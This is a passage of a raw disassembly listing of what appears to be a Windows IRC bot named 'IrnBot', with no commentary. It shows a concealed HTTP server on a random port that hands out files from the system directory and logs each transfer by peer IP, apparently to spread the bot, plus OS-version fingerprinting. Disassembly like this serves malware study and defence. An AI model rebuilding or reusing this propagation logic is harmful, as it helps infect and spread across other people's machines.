		lea	eax, [ebp+var_4]
		push	eax
		rep movsb
		call	sub_403CD0
		lea	eax, [ebp+var_C]
		push	eax
		lea	eax, [ebp+var_4]
		push	offset asc_420564 ; "%x"
		push	eax
		mov	[ebp+var_2], 0
		call	sub_4039A4
		add	esp, 18h
		test	eax, eax
		jz	short loc_418C9F
		mov	eax, ebx
		lea	esi, [eax+1]

loc_418C6B:				; CODE XREF: sub_418B86+EAj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_418C6B
		mov	cl, [ebp+var_C]
		sub	eax, esi
		mov	esi, [ebp+var_8]
		add	esi, 2
		push	25h
		push	esi
		mov	[eax+ebx], cl
		mov	byte ptr [eax+ebx+1], 0
		call	sub_403C10
		test	eax, eax
		pop	ecx
		pop	ecx
		mov	[ebp+var_8], eax
		jnz	loc_418C0D
		jmp	loc_418BC7
; ---------------------------------------------------------------------------

loc_418C9F:				; CODE XREF: sub_418B86+DEj
		xor	esi, esi

loc_418CA1:				; CODE XREF: sub_418B86+82j
		push	ebx
		call	sub_402F5B
		pop	ecx
		pop	edi
		mov	eax, esi
		pop	esi
		pop	ebx
		leave
		retn
sub_418B86	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_418CAF	proc near		; CODE XREF: sub_418D42+A1p

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		mov	eax, [ebp+arg_0]
		mov	[eax], esi
		mov	eax, [ebp+arg_4]
		push	edi
		mov	[eax], esi
		mov	eax, [ebp+arg_8]
		push	offset asc_42054C ; "\r\n"
		push	esi
		mov	[ebx], esi
		mov	[eax], esi
		call	sub_403B70
		mov	edi, eax
		test	edi, edi
		pop	ecx
		pop	ecx
		jnz	short loc_418CDB

loc_418CD7:				; CODE XREF: sub_418CAF+52j
					; sub_418CAF+69j ...
		xor	eax, eax
		jmp	short loc_418D3F
; ---------------------------------------------------------------------------

loc_418CDB:				; CODE XREF: sub_418CAF+26j
		push	offset asc_420550 ; " "
		push	esi
		mov	byte ptr [edi],	0
		call	sub_403DF4
		mov	ecx, [ebp+arg_0]
		push	offset asc_420554 ; " "
		push	0
		mov	[ecx], eax
		call	sub_403DF4
		add	esp, 10h
		test	eax, eax
		mov	[ebx], eax
		jz	short loc_418CD7
		push	offset asc_420558 ; " "
		push	0
		call	sub_403DF4
		test	eax, eax
		pop	ecx
		pop	ecx
		mov	ecx, [ebp+arg_4]
		mov	[ecx], eax
		jz	short loc_418CD7
		mov	ecx, [ebp+arg_8]
		lea	eax, [edi+2]
		cmp	byte ptr [eax],	0
		mov	[ecx], eax
		jz	short loc_418D3C
		push	offset asc_42055C ; "\r\n\r\n"
		push	eax
		call	sub_403B70
		test	eax, eax
		pop	ecx
		pop	ecx
		jz	short loc_418CD7
		mov	byte ptr [eax+2], 0

loc_418D3C:				; CODE XREF: sub_418CAF+76j
		xor	eax, eax
		inc	eax

loc_418D3F:				; CODE XREF: sub_418CAF+2Aj
		pop	edi
		pop	ebp
		retn
sub_418CAF	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame fpd=0CA8h


sub_418D42	proc near		; CODE XREF: sub_4192DB+28p

var_D28		= dword	ptr -0D28h
var_D24		= dword	ptr -0D24h
var_D20		= dword	ptr -0D20h
var_D1C		= dword	ptr -0D1Ch
var_D18		= byte ptr -0D18h
var_D14		= byte ptr -0D14h
var_D13		= byte ptr -0D13h
var_D12		= byte ptr -0D12h
var_D11		= byte ptr -0D11h
var_D08		= byte ptr -0D08h
var_D07		= byte ptr -0D07h
var_908		= byte ptr -908h
var_907		= byte ptr -907h
var_508		= byte ptr -508h
var_507		= byte ptr -507h
var_108		= byte ptr -108h
var_107		= byte ptr -107h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		lea	ebp, [esp-0CA8h]
		sub	esp, 0D28h
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+0CA8h+var_4], eax
		push	ebx
		push	esi
		mov	esi, 3FFh
		xor	ebx, ebx
		push	esi
		lea	eax, [ebp+0CA8h+var_907]
		push	ebx
		push	eax
		mov	[ebp+0CA8h+var_908], bl
		call	sub_407F20
		push	esi
		lea	eax, [ebp+0CA8h+var_507]
		push	ebx
		push	eax
		mov	[ebp+0CA8h+var_508], bl
		call	sub_407F20
		push	103h
		lea	eax, [ebp+0CA8h+var_107]
		push	ebx
		push	eax
		mov	[ebp+0CA8h+var_108], bl
		call	sub_407F20
		push	esi
		lea	eax, [ebp+0CA8h+var_D07]
		push	ebx
		push	eax
		mov	[ebp+0CA8h+var_D08], bl
		call	sub_407F20
		add	esp, 30h
		push	ebx
		push	400h
		lea	eax, [ebp+0CA8h+var_D08]
		push	eax
		push	[ebp+0CA8h+arg_0]
		call	ds:dword_41D26C	; recv
		mov	[ebp+eax+0CA8h+var_D08], bl
		lea	eax, [ebp+0CA8h+var_D1C]
		push	eax
		lea	eax, [ebp+0CA8h+var_D20]
		push	eax
		lea	eax, [ebp+0CA8h+var_D28]
		push	eax
		lea	ebx, [ebp+0CA8h+var_D24]
		lea	esi, [ebp+0CA8h+var_D08]
		call	sub_418CAF
		add	esp, 0Ch
		test	eax, eax
		jz	loc_4192C4
		mov	esi, [ebp+0CA8h+var_D28]
		push	edi
		push	4
		mov	edi, offset aGet ; "GET"
		pop	ecx
		xor	eax, eax
		repe cmpsb
		jz	loc_418ED0
		push	offset aQue?	; "Que?"
		mov	esi, 3FFh
		lea	eax, [ebp+0CA8h+var_908]
		push	esi
		push	eax
		call	sub_402EAE
		lea	eax, [ebp+0CA8h+var_908]
		add	esp, 0Ch
		lea	edx, [eax+1]

loc_418E2C:				; CODE XREF: sub_418D42+EFj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_418E2C
		sub	eax, edx
		xor	ebx, ebx
		mov	[ebp+eax+0CA8h+var_908], bl
		lea	eax, [ebp+0CA8h+var_908]
		lea	ecx, [eax+1]

loc_418E47:				; CODE XREF: sub_418D42+10Aj
		mov	dl, [eax]
		inc	eax
		cmp	dl, bl
		jnz	short loc_418E47
		sub	eax, ecx
		push	eax
		push	offset aHttp1_1501NotI ; "HTTP/1.1 501 Not Implemented\r\nContent-L"...
		lea	eax, [ebp+0CA8h+var_508]
		push	esi
		push	eax
		call	sub_402EAE
		lea	eax, [ebp+0CA8h+var_508]
		add	esp, 10h
		lea	ecx, [eax+1]

loc_418E6F:				; CODE XREF: sub_418D42+132j
		mov	dl, [eax]
		inc	eax
		cmp	dl, bl
		jnz	short loc_418E6F
		sub	eax, ecx
		mov	[ebp+eax+0CA8h+var_508], bl
		lea	eax, [ebp+0CA8h+var_508]
		lea	ecx, [eax+1]

loc_418E88:				; CODE XREF: sub_418D42+14Bj
		mov	dl, [eax]
		inc	eax
		cmp	dl, bl
		jnz	short loc_418E88
		mov	esi, ds:dword_41D228
		push	ebx
		sub	eax, ecx
		push	eax
		lea	eax, [ebp+0CA8h+var_508]
		push	eax
		push	[ebp+0CA8h+arg_0]
		call	esi	; send
		lea	eax, [ebp+0CA8h+var_908]
		lea	ecx, [eax+1]

loc_418EB1:				; CODE XREF: sub_418D42+174j
		mov	dl, [eax]
		inc	eax
		cmp	dl, bl
		jnz	short loc_418EB1
		push	ebx
		sub	eax, ecx
		push	eax
		lea	eax, [ebp+0CA8h+var_908]
		push	eax
		push	[ebp+0CA8h+arg_0]
		call	esi	; send
		jmp	loc_4192B7
; ---------------------------------------------------------------------------

loc_418ED0:				; CODE XREF: sub_418D42+C1j
		mov	edi, [ebp+0CA8h+var_D24]
		push	edi
		call	sub_418B86
		test	eax, eax
		pop	ecx
		jz	loc_4192C3
		mov	eax, edi
		lea	edx, [eax+1]

loc_418EE7:				; CODE XREF: sub_418D42+1AAj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_418EE7
		sub	eax, edx
		cmp	eax, 1
		jbe	loc_419039
		inc	edi
		push	2Fh
		push	edi
		call	sub_403C10
		mov	esi, eax
		xor	ebx, ebx
		cmp	esi, ebx
		pop	ecx
		pop	ecx
		jz	loc_418F96
		mov	[esi], bl
		inc	esi
		push	esi
		call	sub_418B6F
		push	ebx
		push	esi
		call	sub_403C10
		add	esp, 0Ch
		cmp	[esi], bl
		jz	short loc_418F5F
		cmp	byte ptr [eax-1], 5Ch
		jz	short loc_418F5F
		push	esi
		push	edi
		push	offset dword_427CE8
		push	offset aSSS	; "%s\\%s\\%s"
		lea	eax, [ebp+0CA8h+var_108]
		push	103h
		push	eax
		call	sub_402EAE
		lea	eax, [ebp+0CA8h+var_108]
		add	esp, 18h
		lea	esi, [eax+1]

loc_418F56:				; CODE XREF: sub_418D42+219j
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_418F56
		jmp	short loc_418FC5
; ---------------------------------------------------------------------------

loc_418F5F:				; CODE XREF: sub_418D42+1E3j
					; sub_418D42+1E9j
		push	offset dword_427EF8
		push	esi
		push	edi
		push	offset dword_427CE8
		push	offset aSSSS	; "%s\\%s\\%s%s"
		lea	eax, [ebp+0CA8h+var_108]
		push	103h
		push	eax
		call	sub_402EAE
		lea	eax, [ebp+0CA8h+var_108]
		add	esp, 1Ch
		lea	esi, [eax+1]

loc_418F8D:				; CODE XREF: sub_418D42+250j
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_418F8D
		jmp	short loc_418FC5
; ---------------------------------------------------------------------------

loc_418F96:				; CODE XREF: sub_418D42+1C8j
		push	edi
		push	offset dword_427CE8
		push	offset aSS_4	; "%s\\%s"
		lea	eax, [ebp+0CA8h+var_108]
		push	103h
		push	eax
		call	sub_402EAE
		lea	eax, [ebp+0CA8h+var_108]
		add	esp, 14h
		lea	esi, [eax+1]

loc_418FBE:				; CODE XREF: sub_418D42+281j
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_418FBE

loc_418FC5:				; CODE XREF: sub_418D42+21Bj
					; sub_418D42+252j
		sub	eax, esi
		mov	[ebp+eax+0CA8h+var_108], bl
		lea	eax, [ebp+0CA8h+var_108]
		push	eax
		push	offset byte_427DF0
		call	sub_402C69
		test	eax, eax
		pop	ecx
		pop	ecx
		jz	short loc_41903B
		mov	esi, 200h
		push	esi
		call	sub_403AA0
		push	esi
		mov	edi, eax
		push	ebx
		push	edi
		mov	[ebp+0CA8h+var_D20], edi
		call	sub_407F20
		add	esp, 10h
		push	offset aQue?_1	; "Que?"
		push	edi
		call	sub_402E05
		pop	ecx
		dec	eax
		push	eax
		push	edi
		call	sub_402EAE
		mov	eax, edi
		add	esp, 0Ch
		lea	esi, [eax+1]

loc_41901C:				; CODE XREF: sub_418D42+2DFj
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_41901C
		sub	eax, esi
		mov	[eax+edi], bl
		mov	eax, edi
		lea	esi, [eax+1]

loc_41902D:				; CODE XREF: sub_418D42+2F0j
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_41902D
		jmp	loc_41911E
; ---------------------------------------------------------------------------

loc_419039:				; CODE XREF: sub_418D42+1B1j
		xor	ebx, ebx

loc_41903B:				; CODE XREF: sub_418D42+2A1j
		push	ebx
		push	ebx
		push	3
		push	ebx
		push	1
		push	80000000h
		lea	eax, [ebp+0CA8h+var_108]
		push	eax
		call	ds:dword_41D06C	; CreateFileA
		mov	esi, eax
		cmp	esi, 0FFFFFFFFh
		mov	[ebp+0CA8h+var_D24], esi
		jz	short loc_4190CF
		push	ebx
		push	esi
		call	ds:off_41D070
		mov	edi, eax
		push	edi
		mov	[ebp+0CA8h+var_D1C], edi
		call	sub_403AA0
		push	edi
		push	ebx
		push	eax
		mov	[ebp+0CA8h+var_D20], eax
		call	sub_407F20
		add	esp, 10h
		push	ebx
		push	ebx
		push	ebx
		push	esi
		mov	esi, ds:off_41D074
		call	esi ; sub_44397F
		push	ebx
		lea	eax, [ebp+0CA8h+var_D28]
		push	eax
		push	edi
		mov	edi, ds:off_41D078
		jmp	short loc_4190C1
; ---------------------------------------------------------------------------

loc_419099:				; CODE XREF: sub_418D42+389j
		cmp	[ebp+0CA8h+var_D28], ebx
		jnz	loc_419123
		push	[ebp+0CA8h+var_D1C]
		push	ebx
		push	[ebp+0CA8h+var_D20]
		call	sub_407F20
		add	esp, 0Ch
		push	ebx
		push	ebx
		push	ebx
		push	[ebp+0CA8h+var_D24]
		call	esi ; sub_44397F
		push	ebx
		lea	eax, [ebp+0CA8h+var_D28]
		push	eax
		push	[ebp+0CA8h+var_D1C]

loc_4190C1:				; CODE XREF: sub_418D42+355j
		push	[ebp+0CA8h+var_D20]
		push	[ebp+0CA8h+var_D24]
		call	edi ; sub_43A0BE
		test	eax, eax
		jnz	short loc_419099
		jmp	short loc_419123
; ---------------------------------------------------------------------------

loc_4190CF:				; CODE XREF: sub_418D42+31Aj
		mov	esi, 200h
		push	esi
		call	sub_403AA0
		push	esi
		mov	edi, eax
		push	ebx
		push	edi
		mov	[ebp+0CA8h+var_D20], edi
		call	sub_407F20
		add	esp, 10h
		push	offset aQue?_0	; "Que?"
		push	edi
		call	sub_402E05
		pop	ecx
		dec	eax
		push	eax
		push	edi
		call	sub_402EAE
		mov	eax, edi
		add	esp, 0Ch
		lea	esi, [eax+1]

loc_419106:				; CODE XREF: sub_418D42+3C9j
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_419106
		sub	eax, esi
		mov	[eax+edi], bl
		mov	eax, edi
		lea	esi, [eax+1]

loc_419117:				; CODE XREF: sub_418D42+3DAj
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_419117

loc_41911E:				; CODE XREF: sub_418D42+2F2j
		sub	eax, esi
		mov	[ebp+0CA8h+var_D1C], eax

loc_419123:				; CODE XREF: sub_418D42+35Aj
					; sub_418D42+38Bj
		push	400h
		lea	eax, [ebp+0CA8h+var_508]
		push	ebx
		push	eax
		call	sub_407F20
		push	[ebp+0CA8h+var_D1C]
		lea	eax, [ebp+0CA8h+var_508]
		push	offset aHttp1_1200OkCo ; "HTTP/1.1 200 ok\r\nContent-Length: %d\r\nCo"...
		push	3FFh
		push	eax
		call	sub_402EAE
		lea	eax, [ebp+0CA8h+var_508]
		add	esp, 1Ch
		lea	esi, [eax+1]

loc_41915A:				; CODE XREF: sub_418D42+41Dj
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_41915A
		sub	eax, esi
		mov	[ebp+eax+0CA8h+var_508], bl
		lea	eax, [ebp+0CA8h+var_508]
		lea	esi, [eax+1]

loc_419173:				; CODE XREF: sub_418D42+436j
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_419173
		sub	eax, esi
		mov	esi, ds:dword_41D228
		push	ebx
		push	eax
		lea	eax, [ebp+0CA8h+var_508]
		push	eax
		push	[ebp+0CA8h+arg_0]
		call	esi	; send
		test	eax, eax
		jz	loc_4192AE
		push	ebx
		push	[ebp+0CA8h+var_D1C]
		push	[ebp+0CA8h+var_D20]
		push	[ebp+0CA8h+arg_0]
		call	esi	; send
		test	eax, eax
		jz	loc_4192AE
		lea	eax, [ebp+0CA8h+var_108]
		push	eax
		push	offset byte_427DF0
		call	sub_402C69
		test	eax, eax
		pop	ecx
		pop	ecx
		jnz	loc_4192AE
		push	100h
		call	sub_402A08
		mov	esi, eax
		push	esi
		call	sub_402E05
		push	eax
		mov	ebx, offset aNn	; "­­ÏÀÛÝ"
		call	sub_419EC1
		xor	eax, eax
		lea	edi, [ebp+0CA8h+var_D18]
		stosd
		stosd
		stosd
		add	esp, 0Ch
		stosd
		lea	eax, [ebp+0CA8h+var_D24]
		push	eax
		lea	eax, [ebp+0CA8h+var_D18]
		push	eax
		push	[ebp+0CA8h+arg_0]
		mov	[ebp+0CA8h+var_D24], 10h
		call	ds:dword_41D278	; getpeername
		movzx	eax, [ebp+0CA8h+var_D11]
		movzx	ecx, [ebp+0CA8h+var_D12]
		shl	eax, 8
		add	eax, ecx
		movzx	ecx, [ebp+0CA8h+var_D13]
		shl	eax, 8
		add	eax, ecx
		movzx	ecx, [ebp+0CA8h+var_D14]
		shl	eax, 8
		add	eax, ecx
		push	2
		mov	[ebp+0CA8h+var_D1C], eax
		push	4
		lea	eax, [ebp+0CA8h+var_D1C]
		push	eax
		call	ds:dword_41D224	; gethostbyaddr
		test	eax, eax
		push	dword_434F88
		jnz	short loc_419276
		movzx	eax, [ebp+0CA8h+var_D11]
		push	eax
		movzx	eax, [ebp+0CA8h+var_D12]
		push	eax
		movzx	eax, [ebp+0CA8h+var_D13]
		push	eax
		movzx	eax, [ebp+0CA8h+var_D14]
		push	eax
		push	offset aHttpTransferD_ ; "HTTP:	Transfer: %d.%d.%d.%d (N/A). %d	T"...
		push	esi
		push	0
		push	offset dword_427FFC
		call	sub_417B51
		add	esp, 24h
		jmp	short loc_4192A1
; ---------------------------------------------------------------------------

loc_419276:				; CODE XREF: sub_418D42+507j
		push	dword ptr [eax]
		movzx	eax, [ebp+0CA8h+var_D11]
		push	eax
		movzx	eax, [ebp+0CA8h+var_D12]
		push	eax
		movzx	eax, [ebp+0CA8h+var_D13]
		push	eax
		movzx	eax, [ebp+0CA8h+var_D14]
		push	eax
		push	offset aHttpTransfer_0 ; "HTTP:	Transfer: %d.%d.%d.%d (%s). %d To"...
		push	esi
		push	0
		push	offset dword_427FFC
		call	sub_417B51
		add	esp, 28h

loc_4192A1:				; CODE XREF: sub_418D42+532j
		inc	dword_434F88
		push	esi
		call	sub_402F5B
		pop	ecx

loc_4192AE:				; CODE XREF: sub_418D42+453j
					; sub_418D42+46Aj ...
		push	[ebp+0CA8h+var_D20]
		call	sub_4039C3
		pop	ecx

loc_4192B7:				; CODE XREF: sub_418D42+189j
		push	[ebp+0CA8h+arg_0]
		call	ds:dword_41D280	; closesocket

loc_4192C3:				; CODE XREF: sub_418D42+19Aj
		pop	edi

loc_4192C4:				; CODE XREF: sub_418D42+ABj
		mov	ecx, [ebp+0CA8h+var_4]
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402AD0
		add	ebp, 0CA8h
		leave
		retn
sub_418D42	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4192DB	proc near		; DATA XREF: sub_419430+27o

arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

; FUNCTION CHUNK AT 0043F511 SIZE 0000000B BYTES

		push	ebp
		mov	ebp, esp
		cmp	[ebp+arg_4], 401h
		jz	short loc_4192EE
		pop	ebp
		jmp	ds:off_41D1FC
; ---------------------------------------------------------------------------

loc_4192EE:				; CODE XREF: sub_4192DB+Aj
		mov	eax, [ebp+arg_C]
		dec	eax
		jz	short loc_419300
		sub	eax, 7
		jnz	short loc_419309
		call	sub_418B4D
		jmp	short loc_419309
; ---------------------------------------------------------------------------

loc_419300:				; CODE XREF: sub_4192DB+17j
		push	[ebp+arg_8]
		call	sub_418D42
		pop	ecx

loc_419309:				; CODE XREF: sub_4192DB+1Cj
					; sub_4192DB+23j
		xor	eax, eax
		pop	ebp
		retn	10h
sub_4192DB	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_41930F	proc near		; CODE XREF: sub_419430+9Bp

arg_0		= dword	ptr  4

		push	ebx
		push	ebp
		push	esi
		push	edi
		mov	edi, 104h
		push	edi
		xor	ebp, ebp
		push	ebp
		mov	ebx, offset dword_427CE8
		push	ebx
		call	sub_407F20
		push	edi
		push	ebp
		mov	esi, offset dword_427EF8
		push	esi
		call	sub_407F20
		push	edi
		push	ebp
		mov	ebp, offset byte_427DF0
		push	ebp
		call	sub_407F20
		add	esp, 24h
		push	edi
		push	ebx
		call	ds:dword_41D0F0	; GetSystemDirectoryA
		push	edi
		mov	ebx, offset byte_426671
		call	sub_419EC1
		push	esi
		push	offset dword_427CE8
		push	offset aSS_1	; "%s\\%s"
		push	103h
		push	ebp
		call	sub_402EAE
		mov	eax, ebp
		add	esp, 18h
		lea	ecx, [eax+1]

loc_419375:				; CODE XREF: sub_41930F+6Bj
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_419375
		push	0
		push	1
		sub	eax, ecx
		push	2
		mov	byte_427DF0[eax], dl
		call	ds:dword_41D220	; socket
		cmp	eax, 0FFFFFFFFh
		mov	dword_427DEC, eax
		jnz	short loc_4193A8
		push	eax

loc_41939B:				; CODE XREF: sub_41930F+E7j
		call	ds:dword_41D280	; closesocket
		xor	eax, eax
		jmp	loc_41942B
; ---------------------------------------------------------------------------

loc_4193A8:				; CODE XREF: sub_41930F+89j
		mov	eax, 0FFDCh
		mov	ebx, 3E8h
		call	sub_419AB7
		push	eax
		mov	dword_427BD4, eax
		mov	word_427CD4, 2
		call	ds:dword_41D270	; htons
		and	dword_427CD8, 0
		push	10h
		push	offset word_427CD4
		push	dword_427DEC
		mov	word_427CD6, ax
		call	ds:dword_41D27C	; bind
		test	eax, eax
		jz	short loc_4193F8

loc_4193F0:				; CODE XREF: sub_41930F+102j
					; sub_41930F+114j
		push	dword_427DEC
		jmp	short loc_41939B
; ---------------------------------------------------------------------------

loc_4193F8:				; CODE XREF: sub_41930F+DFj
		push	9
		push	401h
		push	[esp+18h+arg_0]
		push	dword_427DEC
		call	ds:dword_41D22C	; WSAAsyncSelect
		test	eax, eax
		jnz	short loc_4193F0
		push	4
		push	dword_427DEC
		call	ds:dword_41D230	; listen
		test	eax, eax
		jnz	short loc_4193F0
		inc	eax
		mov	byte_427EF4, al

loc_41942B:				; CODE XREF: sub_41930F+94j
		pop	edi
		pop	esi
		pop	ebp
		pop	ebx
		retn
sub_41930F	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_419430	proc near		; DATA XREF: sub_419507+21o

var_50		= dword	ptr -50h
var_4C		= dword	ptr -4Ch
var_48		= dword	ptr -48h
var_44		= dword	ptr -44h
var_40		= dword	ptr -40h
var_3C		= dword	ptr -3Ch
var_38		= dword	ptr -38h
var_34		= dword	ptr -34h
var_30		= dword	ptr -30h
var_2C		= dword	ptr -2Ch
var_28		= dword	ptr -28h
var_24		= dword	ptr -24h
var_20		= byte ptr -20h

		push	ebp
		mov	ebp, esp
		sub	esp, 50h
		mov	eax, dword_427CE4
		push	ebx
		mov	ebx, ds:off_41D1F0
		push	esi
		push	edi
		mov	edi, 7F00h
		push	edi
		xor	esi, esi
		push	esi
		mov	[ebp+var_3C], eax
		mov	[ebp+var_28], offset dword_426B94
		mov	[ebp+var_48], offset sub_4192DB
		mov	[ebp+var_4C], 8
		mov	[ebp+var_50], 30h
		call	ebx ; sub_443E4B
		push	edi
		push	esi
		mov	[ebp+var_38], eax
		call	ebx ; sub_443E4B
		push	edi
		push	esi
		mov	[ebp+var_24], eax
		call	ds:off_41D208
		mov	[ebp+var_34], eax
		lea	eax, [ebp+var_50]
		push	eax
		mov	[ebp+var_2C], esi
		mov	[ebp+var_44], esi
		mov	[ebp+var_40], esi
		mov	[ebp+var_30], 1
		call	ds:off_41D1EC
		test	ax, ax
		jz	short loc_4194FE
		push	esi
		push	dword_427CE4
		mov	eax, 80000000h
		push	esi
		push	esi
		push	esi
		push	esi
		push	eax
		push	eax
		push	0CF0000h
		push	offset aIrnbot	; "IrnBot"
		push	offset dword_426B94
		push	esi
		call	ds:off_41D1F8
		push	eax
		call	sub_41930F
		test	eax, eax
		pop	ecx
		jz	short loc_4194FE
		mov	edi, ds:off_41D204
		jmp	short loc_4194F1
; ---------------------------------------------------------------------------

loc_4194DD:				; CODE XREF: sub_419430+CCj
		lea	eax, [ebp+var_20]
		push	eax
		call	ds:off_41D1F4
		lea	eax, [ebp+var_20]
		push	eax
		call	ds:off_41D200

loc_4194F1:				; CODE XREF: sub_419430+ABj
		push	esi
		push	esi
		push	esi
		lea	eax, [ebp+var_20]
		push	eax
		call	edi ; sub_45AEC9
		test	eax, eax
		jnz	short loc_4194DD

loc_4194FE:				; CODE XREF: sub_419430+70j
					; sub_419430+A3j
		pop	edi
		pop	esi
		xor	eax, eax
		pop	ebx
		leave
		retn	4
sub_419430	endp


; =============== S U B	R O U T	I N E =======================================



sub_419507	proc near		; CODE XREF: sub_4022D6+70p
					; sub_41C28D+401p
		push	4
		mov	eax, offset loc_41C969
		call	sub_40497C
		push	8
		call	sub_40340B
		mov	esi, eax
		pop	ecx
		mov	[ebp-10h], esi
		and	dword ptr [ebp-4], 0
		test	esi, esi
		jz	short loc_41953B
		push	offset sub_419430
		xor	ecx, ecx
		mov	edi, offset aHs	; "HS"
		call	sub_414884
		jmp	short loc_41953D
; ---------------------------------------------------------------------------

loc_41953B:				; CODE XREF: sub_419507+1Fj
		xor	eax, eax

loc_41953D:				; CODE XREF: sub_419507+32j
		cmp	dword ptr [eax+4], 0
		setnz	al
		call	sub_404A1B
		retn
sub_419507	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_41954A	proc near		; CODE XREF: sub_419AB7:loc_419ADBp
		mov	eax, dword_427BF0
		mov	edx, dword_427BF4
		lea	ecx, ds:427BF8h[eax*4]
		push	esi
		mov	esi, eax
		mov	eax, dword_427BF8[edx*4]
		add	eax, [ecx]
		and	eax, 3FFFFFFFh
		inc	esi
		cmp	esi, 37h
		mov	[ecx], eax
		jnz	short loc_419577
		xor	esi, esi

loc_419577:				; CODE XREF: sub_41954A+29j
		inc	edx
		cmp	edx, 37h
		jnz	short loc_41957F
		xor	edx, edx

loc_41957F:				; CODE XREF: sub_41954A+31j
		mov	dword_427BF0, esi
		mov	dword_427BF4, edx
		sar	eax, 6
		pop	esi
		retn
sub_41954A	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_419590	proc near		; CODE XREF: sub_40207A+125p
					; sub_417C7B:loc_417D8Cp ...

var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		sub	esp, 14h
		push	ebx
		lea	eax, [ebp+var_10]
		push	eax
		call	ds:dword_41D058	; QueryPerformanceCounter
		test	eax, eax
		jz	short loc_41960C
		lea	eax, [ebp+var_8]
		push	eax
		call	ds:off_41D064
		test	eax, eax
		jz	short loc_41960C
		push	[ebp+var_4]
		push	[ebp+var_8]
		push	[ebp+var_C]
		push	[ebp+var_10]
		call	sub_41C740
		push	0
		push	15180h
		push	edx
		push	eax
		call	sub_411BB0
		push	0
		push	0E10h
		push	ebx
		push	ecx
		mov	dword_427BD8, eax
		mov	dword_427BDC, edx
		call	sub_411BB0
		push	0
		push	3Ch
		push	ebx
		push	ecx
		mov	dword_427BE0, eax
		mov	dword_427BE4, edx
		call	sub_41C740
		mov	dword_427BE8, eax
		mov	dword_427BEC, edx

loc_41960C:				; CODE XREF: sub_419590+13j
					; sub_419590+21j
		pop	ebx
		leave
		retn
sub_419590	endp


; =============== S U B	R O U T	I N E =======================================



sub_41960F	proc near		; CODE XREF: sub_40207A+EFp
					; sub_417C7B+BCp ...

arg_0		= dword	ptr  4
arg_4		= byte ptr  8

		push	[esp+arg_0]
		push	0
		push	esi
		call	sub_407F20
		add	esp, 0Ch
		cmp	[esp+arg_4], 0
		push	[esp+arg_0]
		push	esi
		jz	short loc_419631
		push	1002h
		jmp	short loc_419633
; ---------------------------------------------------------------------------

loc_419631:				; CODE XREF: sub_41960F+19j
		push	7

loc_419633:				; CODE XREF: sub_41960F+20j
		push	800h
		call	ds:off_41D054
		mov	eax, esi
		retn
sub_41960F	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame fpd=74h


sub_419641	proc near		; CODE XREF: sub_40207A+DAp
					; sub_417C7B+8Bp ...

var_98		= dword	ptr -98h
var_94		= dword	ptr -94h
var_90		= dword	ptr -90h
var_8C		= dword	ptr -8Ch
var_88		= dword	ptr -88h
var_84		= byte ptr -84h
var_4		= dword	ptr -4
arg_0		= byte ptr  8

		push	ebp
		lea	ebp, [esp-74h]
		sub	esp, 98h
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+74h+var_4], eax
		push	ebx
		push	edi
		lea	eax, [ebp+74h+var_98]
		push	eax
		mov	ebx, ecx
		mov	[ebp+74h+var_98], 94h
		call	ds:dword_41D068	; GetVersionExA
		push	ebx
		xor	edi, edi
		push	edi
		push	esi
		call	sub_407F20
		add	esp, 0Ch
		cmp	[ebp+74h+var_94], 6
		jnz	short loc_41968A
		cmp	[ebp+74h+var_90], edi
		jnz	short loc_4196F5
		push	offset aVis	; "VIS"
		jmp	short loc_4196FA
; ---------------------------------------------------------------------------

loc_41968A:				; CODE XREF: sub_419641+3Bj
		cmp	[ebp+74h+var_94], 5
		jnz	short loc_4196B6
		cmp	[ebp+74h+var_90], 2
		jnz	short loc_41969D
		push	offset a2k3	; "2K3"
		jmp	short loc_4196FA
; ---------------------------------------------------------------------------

loc_41969D:				; CODE XREF: sub_419641+53j
		cmp	[ebp+74h+var_90], 1
		jnz	short loc_4196AA
		push	offset aXp_0	; "XP"
		jmp	short loc_4196FA
; ---------------------------------------------------------------------------

loc_4196AA:				; CODE XREF: sub_419641+60j
		cmp	[ebp+74h+var_90], edi
		jnz	short loc_4196F5
		push	offset a2k	; "2K"
		jmp	short loc_4196FA
; ---------------------------------------------------------------------------

loc_4196B6:				; CODE XREF: sub_419641+4Dj
		cmp	[ebp+74h+var_94], 4
		jnz	short loc_4196F5
		cmp	[ebp+74h+var_90], 5Ah
		jnz	short loc_4196C9
		push	offset aMe	; "ME"
		jmp	short loc_4196FA
; ---------------------------------------------------------------------------

loc_4196C9:				; CODE XREF: sub_419641+7Fj
